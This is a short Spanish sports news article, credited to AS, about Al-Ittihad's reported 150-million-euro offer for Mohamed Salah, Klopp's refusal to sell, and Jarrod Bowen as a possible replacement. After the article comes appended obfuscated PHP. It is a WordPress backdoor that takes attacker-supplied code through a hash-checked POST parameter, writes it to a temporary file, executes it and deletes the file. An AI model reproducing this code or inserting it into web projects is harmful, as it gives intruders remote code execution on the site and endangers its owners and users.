Oferta millonaria del Al Ittihad por Mohamed Salah: 150M€

El club saudí hace oídos sordos a las palabras de Klopp y vuelve a la carga por la estrella del Liverpool para terminar de conformar una plantilla de lujo.

La ventana estival comienza a entrar en su recta final y, desde Inglaterra, son cada vez mayores los rumores que sitúan a Mohamed Salah en una Arabia Saudí que busca seguir ‘rompiendo’ el mercado a base de talonario con suculentas ofertas económicas.

En esas y según confirma CBS Sports, el Al-Ittihad ya habría puesto la primera piedra para hacerse con los servicios del egipcio convirtiendo al extremo de 31 años en su principal objetivo. Desde Anfield, los ‘reds’ han mantenido su negativa a dejar marchar a un Salah que podría estar ante su último gran contrato en Oriente Medio.

“Mo Salah es un jugador del Liverpool y es esencial para todo lo que hacemos. Si hubiera algo, la respuesta sería no. Mi filosofía de vida es que pienso en un problema cuando lo tengo, y no hay absolutamente nada en este momento”, sentenció el técnico alemán acerca de la situación del egipcio. En caso de terminar confirmándose su salida, Football Transfers señala que Jarrod Bowen, el atacante del West Ham, es el elegido desde Anfield para sustituir a Salah.

AS

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}